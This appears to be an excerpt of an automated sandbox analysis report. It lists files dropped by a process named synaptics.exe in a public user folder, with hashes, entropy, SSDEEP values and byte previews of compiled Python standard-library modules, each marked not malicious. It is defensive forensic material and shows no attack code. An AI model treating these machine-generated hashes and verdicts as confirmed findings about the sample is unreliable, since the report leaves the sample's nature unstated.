                                                                                                                                                                                                                                  MD5:67AAD5A266EE3D0C2983FB9366BB3220
                                                                                                                                                                                                                                  SHA1:4BE9644FF721A2F21864AEB20A5FF706DAA18764
                                                                                                                                                                                                                                  SHA-256:5A3E17BDF3D60CBB608A02833FA90B226214BC6C259F7C1733C62908F6C194E8
                                                                                                                                                                                                                                  SHA-512:DACEC2B1A1AAC7824463279D50A1CA84E6AA2C9519B17AE711BD50A6AAC903C7CAC771A7C28610C04D66E98A9F0BB473F6C67034ACA755D5305A55E87189B812
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2388
                                                                                                                                                                                                                                  Entropy (8bit):5.4362404290272215
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:G8HYqr1EKznGxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:G8HY0EiWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                                                  MD5:A1790D1C8EB211D53D7CF8C2BC364603
                                                                                                                                                                                                                                  SHA1:B8C8F441599344717FAE10EC9BC07F9EF828C9D8
                                                                                                                                                                                                                                  SHA-256:4A64A8912E8EBCFCAA06D4851250A4B7762639552DAC238076E056144B6B879B
                                                                                                                                                                                                                                  SHA-512:CD8FA500C7DAFC0962A61C95601E1B89B88B38DC2F00775E5ADD552ED7F31C3BC958A4CEB24A8FFAF038C1B5682A8D8936571373F09B88E61D18593D348BD6AF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....2C:\Users\Public\M20EKMMEH2\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......finalr....r....r
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5610
                                                                                                                                                                                                                                  Entropy (8bit):5.232623018536189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iD5aoZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:ysoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                                                  MD5:CFFAEBDFC0474227B538F187786085AB
                                                                                                                                                                                                                                  SHA1:1A25536CF633BBA08FC7741646432621B709F19B
                                                                                                                                                                                                                                  SHA-256:D807DF53CE0BB4DF3AE8F3A206B6E79E17552197FE39B906B1557F9A597FAE94
                                                                                                                                                                                                                                  SHA-512:90C8C0508D14437719EC93ED883CBAC5615E93DC2E005D887A3D917358297D175AEED6129AFDD15B04CCDDF8509133A2452AD414E04317110A991BE276536917
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....0C:\Users\Public\M20EKMMEH2\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.Vi
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1608
                                                                                                                                                                                                                                  Entropy (8bit):4.726382272916581
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ZVtus1pip5nHUrYPyaGcLXaLOsJkLBBn1U:ZbuWkHUPNcLXaasmP1U
                                                                                                                                                                                                                                  MD5:D7D2BDE69388B39EE88C3B95E32AE1CB
                                                                                                                                                                                                                                  SHA1:B8869EC48CF63D8E10B9B65598119FC0FD223BA7
                                                                                                                                                                                                                                  SHA-256:060268CA2E8E62120D31E2B15BDBB98565DEB1F84FB04850BC57B31884A93D80
                                                                                                                                                                                                                                  SHA-512:C464E8D49BF5C7083C16C610A9CDD781D0DAFF1CB7B3260D901DE8C49ED5FCC041A69ADE9505E598050273673A52031A2786995550770B2496454A84041E51C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....1C:\Users\Public\M20EKMMEH2\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r....)...Strea
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6427
                                                                                                                                                                                                                                  Entropy (8bit):5.803846609080695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:PWZsdAk4kaBaNzpZOZBDcxHN/8O2OHb4k7:PjzpZOZBDcpNp2iT
                                                                                                                                                                                                                                  MD5:CE68FA3895F543A71FAC75A6B4ADB306
                                                                                                                                                                                                                                  SHA1:D81576955C3DFE438D5E83AB9AB9ECE3F9C871D2
                                                                                                                                                                                                                                  SHA-256:DECDD1B71A605D715EAF7CD3FF60405573000CE8273040FF202BECAECE3EC614
                                                                                                                                                                                                                                  SHA-512:88268CBEE5A30BDB470E8C2D77A197DA8A042EFEFD7969306A98A47F91BEE449AFC476FF9C77FEC105651132FA7D5EAFF97A24603C6C733F4D3542709F7A1670
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35189
                                                                                                                                                                                                                                  Entropy (8bit):5.380431913127976
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:poG3Ky3gu5p4T9uaP5OvX/6aHpq//oUyt2iGYS9uj8Eqds:iG3Rgu5p4T9u25OvX/6aHpg/gt2iGYSo
                                                                                                                                                                                                                                  MD5:34C4704DA8060812A94914794982C402
                                                                                                                                                                                                                                  SHA1:C0E6DAD28CBC7E94AE0B8B2BF54820E10416B877
                                                                                                                                                                                                                                  SHA-256:B4C01D59510D206D4AA5CE999A53EB255D4EAD1A3F4714A5C69E531B6065F647
                                                                                                                                                                                                                                  SHA-512:32BEB2A529F5B3A851B834866388AA79ED446855772E5BFE6A0B0ACD0B3436746A702DCA659D449B9A63FF16DD3CEFB2A5359C7F120FB5171D62FA4C6F730CF2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):53451
                                                                                                                                                                                                                                  Entropy (8bit):5.561451599007097
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:6Bq5TRGXx0wM1oyXc63+dpUTXcc5he57HfAqZ8K20oERqRGwFkEu58kvknKdVWV6:1AI1FXZ+bUQ8hlER6dg6hMT
                                                                                                                                                                                                                                  MD5:7192065680E0EB8ABECB255E3CD72E7D
                                                                                                                                                                                                                                  SHA1:3982C598A36FE78F97A70153E8500408B5C0FB64
                                                                                                                                                                                                                                  SHA-256:2E85A6389DC1BC60C9FC536B8FC1296A86C8DC071561DD1C36B4D623ADD412FF
                                                                                                                                                                                                                                  SHA-512:D70CDACD5D7A8048D67E2A0238053F356FB3990280C9632216225DF295D878633C639B18108193319A88A89D35637C4A849180B6E03CDEDDD908F346567A090C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15349
                                                                                                                                                                                                                                  Entropy (8bit):5.4472729352887805
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Ld6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:pWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                                                  MD5:21445DC41A48444DCC20AD8F79AD2766
                                                                                                                                                                                                                                  SHA1:DCE8B764793CA5B56116425794190CCB7EF4A233
                                                                                                                                                                                                                                  SHA-256:81785FA43D1DB00BA972CA09EB6A8A47B90F4EBC2E23102469374B1535C293DB
                                                                                                                                                                                                                                  SHA-512:E0D24ADBB7F0DA54F5752AB367A4AB3A29F11738088E0154B1CEA5FCEFD5ABB4DB2F84A3733AF53A9387385D22C0B8DD9053951A904474C3895BB9F42FF26D83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3816
                                                                                                                                                                                                                                  Entropy (8bit):5.548429869472314
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6uKEn4Gs1xwkB8QpIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:QEkloMK1a0j+DmF2QZIh
                                                                                                                                                                                                                                  MD5:C6252648F8F82DEF2CD4D890469A6990
                                                                                                                                                                                                                                  SHA1:6EB64F38F31AE912A6BAF49F9E382AA3A902F39C
                                                                                                                                                                                                                                  SHA-256:F403714CC2CCF0C532B2FF9F4B7BB604E878A8D1B44DDDC77BDDE71323031298
                                                                                                                                                                                                                                  SHA-512:C4DB2AFB1E023A36616814C9467CDFD9B3E8F95697C85188E4188DB3A822B9A14A3897BFF9ED801C602599B3E16037689E4810A68A439AD9A77C17FC53B028DC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....4C:\Users\Public\M20EKMMEH2\lib\importlib\__init__.pyr....A...s..............r....c....................C...s...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                  Entropy (8bit):5.029787284088814
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:eGYO7KXEXsl7Xrqj9FXHRLSVRibTAsKhnsRyy:MrEXEXrqhFXHPTbIsZ
                                                                                                                                                                                                                                  MD5:6624B3757A30073DDF57DE66E75762E7
                                                                                                                                                                                                                                  SHA1:0AC994D794FEFD5FDEFBD15F05B42D2EEBE6FA9D
                                                                                                                                                                                                                                  SHA-256:1702384AD105FF820C24E8B3A25439401637985CDADFA885D6B554580F963D2A
                                                                                                                                                                                                                                  SHA-512:007DA4F7FB94349587650545A776BC8A6C37CEB2BF993A76B3252019477F15AA860233598E7D7DAC818D676155B3586AE666CF2C8107E3B0654BE3A04AE17375
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r.....0C:\Users\Public\M20EKMMEH2\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failure...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3714
                                                                                                                                                                                                                                  Entropy (8bit):4.672565461372954
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:udimBhyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:yhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                                                                  MD5:4C4432E48B5FDBEB195792D570ACFA57
                                                                                                                                                                                                                                  SHA1:A8A487F996FC7D95D556D7677AF5BF7FFF295256
                                                                                                                                                                                                                                  SHA-256:4480D89F0E5C311CEA19033DAB959931FDEB75A55507F96FF9E7AB70EED91115
                                                                                                                                                                                                                                  SHA-512:1029AC0B4E11E142C08EC17B885D940E2EE7DCDDC82A6B4FBF830597537EEDF665716E23ED023D214E57D2F32D11B0B9744F00D5AD0664669AABACDD52A862AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....5C:\Users\Public\M20EKMMEH2\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adapt a loader to
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2978
                                                                                                                                                                                                                                  Entropy (8bit):5.204342612952029
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MfiZ38jH+kP4PY+IINYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:MfipsH3AlYali7ZL7dillY2s033mm2vX
                                                                                                                                                                                                                                  MD5:E2A19479F3FA688DB6D83348C9BA3D27
                                                                                                                                                                                                                                  SHA1:3C169AC74D1217EDB641132A042D19BEF06958D7
                                                                                                                                                                                                                                  SHA-256:301A658455EE25240B503B9FA482004B876FAC1B8E013E68104AEA962BB53E72
                                                                                                                                                                                                                                  SHA-512:965E5592394BE8D6418BB8DB4426FBF142FA14BB4CF163C8BED46DF1896980F49BD53820C3A2CECE8E1A245FF2188D6565FBFAE0C0EF2348540890B99D84B285
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....3C:\Users\Public\M20EKMMEH2\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.d...}.|.d.u.r
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15902
                                                                                                                                                                                                                                  Entropy (8bit):5.108702443874358
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Ez+B5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:EeDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                                                                  MD5:0025F3087513E18D7047AA569CBA93A4
                                                                                                                                                                                                                                  SHA1:E60C8CC9C8E60F588A9A66AD734B76EE60A332F5
                                                                                                                                                                                                                                  SHA-256:2FFE628D16F1302A2116C70A3D75C21F6DE9F47392EA7BD5EDB2D1E198BFCA7D
                                                                                                                                                                                                                                  SHA-512:996747E0082A6575B3121EC110E2D5151F5F27052498D212683BD0C79F4C929A9B38FC7F11DFDBA25B8F2732187DCE4B6BB520AF2322D398C91977DC7E32B9C0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r...../C:\Users\Public
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):955
                                                                                                                                                                                                                                  Entropy (8bit):5.424660826253513
